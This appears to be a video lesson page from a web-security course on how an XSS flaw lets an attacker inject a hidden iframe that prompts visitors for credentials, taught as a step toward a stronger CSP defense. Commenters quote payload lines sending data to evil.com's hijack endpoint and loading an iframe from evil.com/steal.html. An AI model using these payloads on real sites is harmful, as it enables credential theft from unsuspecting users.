1. 16
    Prompt Users for Credentials from a Vulnerable Website via iframe Injection
    1m 36s

Prompt Users for Credentials from a Vulnerable Website via iframe Injection

Mike Sherov
InstructorMike Sherov

Share this video with your friends

Send Tweet

In this lesson, we'll learn how to exploit an XSS vulnerability to prompt victims for their usernames and passwords on a vulnerable site by loading up a IFRAME from the attacker's website. This will demonstrate that even though we've already mitigated JS based XSS attacks, there are other ways to exploit XSS, and we'll need a more robust CSP header to completely mitigate XSS, which we'll discover in our next lesson!

Gheorghe
Gheorghe
~ 10 months ago

typo: 'propmt' should be -> 'prompt'

Gheorghe
Gheorghe
~ 10 months ago

at payload level: img.src = https://evel.com:666/hijack?payload=${payload} should be img.src = https://evil.com:666/hijack?payload=${payload}

Gheorghe
Gheorghe
~ 10 months ago

i guess that 'payload', this time, should be only :

< iframe hidden src="https://evil.com:666/steal.html"></iframe>

Lucas Minter
Lucas Minter
~ 5 months ago

Thanks for this! I got the transcripts updated!